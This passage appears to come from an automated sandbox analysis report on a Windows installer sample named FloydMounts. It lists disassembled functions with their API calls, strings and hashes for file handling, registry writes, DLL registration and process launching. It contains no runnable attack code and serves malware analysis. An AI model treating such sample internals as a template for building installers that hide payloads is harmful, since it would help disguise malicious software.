                                                                                              • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                              • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                                                                              • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                              • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                                                                              Function 00406AC5 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 163filestringmemoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                                                              • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                                                              • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                                                                • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                              • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                                                              • wsprintfA.USER32 ref: 00406B79
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                                                              • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                                                                • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                              • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                                                              • CloseHandle.KERNEL32(?), ref: 00406C88
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662975407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662957220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663004750.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663336351.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_FloydMounts.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                              • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                                                              • API String ID: 565278875-3368763019
                                                                                              • Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                              • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                                                                              • Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                              • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                                                                              Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                              • DeleteObject.GDI32(?), ref: 004010F6
                                                                                              • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                              • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                              • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                              • DeleteObject.GDI32(?), ref: 0040116E
                                                                                              • EndPaint.USER32(?,?), ref: 00401177
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662975407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662957220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663004750.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663336351.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_FloydMounts.jbxd
                                                                                              Similarity
                                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                              • String ID: F
                                                                                              • API String ID: 941294808-1304234792
                                                                                              • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                              • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                                                                              • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                              • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                                                                              Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                              • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                              • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                              Strings
                                                                                              • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                              • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                              • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                              • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                              • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                              • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662975407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662957220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663004750.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663336351.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_FloydMounts.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                              • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                              • API String ID: 1641139501-220328614
                                                                                              • Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                              • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                                                                              • Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                              • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                                                                              Function 00406113 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 72filestringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                              • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                                                              • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                                                              • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                                                              • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                                                                              • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662975407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662957220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663004750.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663336351.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_FloydMounts.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                              • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                                                                              • API String ID: 3734993849-3206598305
                                                                                              • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                              • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                                                                              • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                              • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                                                                              Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                              • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                              • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                              • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                              Strings
                                                                                              • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662975407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662957220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663004750.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663336351.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_FloydMounts.jbxd
                                                                                              Similarity
                                                                                              • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                              • String ID: created uninstaller: %d, "%s"
                                                                                              • API String ID: 3294113728-3145124454
                                                                                              • Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                              • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                                                                              • Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                              • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                                                                              Function 004023F0 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 83libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424579,74DF23A0,00000000), ref: 00404FD6
                                                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424579,74DF23A0,00000000), ref: 00404FE6
                                                                                                • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424579,74DF23A0,00000000), ref: 00404FF9
                                                                                                • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                              • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                              • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                              Strings
                                                                                              • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                              • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                              • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                              • hmq, xrefs: 00402473
                                                                                              • `G, xrefs: 0040246E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662975407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662957220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663004750.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663336351.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_FloydMounts.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                              • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G$hmq
                                                                                              • API String ID: 1033533793-2063474959
                                                                                              • Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                              • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                                                                              • Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                              • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                                                                              Function 00403DF6 Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                                                              • GetSysColor.USER32(00000000), ref: 00403E2C
                                                                                              • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                                                              • SetBkMode.GDI32(?,?), ref: 00403E44
                                                                                              • GetSysColor.USER32(?), ref: 00403E57
                                                                                              • SetBkColor.GDI32(?,?), ref: 00403E67
                                                                                              • DeleteObject.GDI32(?), ref: 00403E81
                                                                                              • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662975407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662957220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663004750.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663336351.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_FloydMounts.jbxd
                                                                                              Similarity
                                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2320649405-0
                                                                                              • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                              • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                                                                              • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                              • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                                                                              Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424579,74DF23A0,00000000), ref: 00404FD6
                                                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424579,74DF23A0,00000000), ref: 00404FE6
                                                                                                • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424579,74DF23A0,00000000), ref: 00404FF9
                                                                                                • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                              • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                              • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                              Strings
                                                                                              • Exec: success ("%s"), xrefs: 00402263
                                                                                              • Exec: command="%s", xrefs: 00402241
                                                                                              • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662975407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662957220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663004750.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663336351.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_FloydMounts.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                              • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                              • API String ID: 2014279497-3433828417
                                                                                              • Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                              • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                                                                              • Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                              • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                                                                              Function 0040487A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                                                              • GetMessagePos.USER32 ref: 0040489D
                                                                                              • ScreenToClient.USER32(?,?), ref: 004048B5
                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662975407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662957220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663004750.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663336351.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_FloydMounts.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$Send$ClientScreen
                                                                                              • String ID: f
                                                                                              • API String ID: 41195575-1993550816
                                                                                              • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
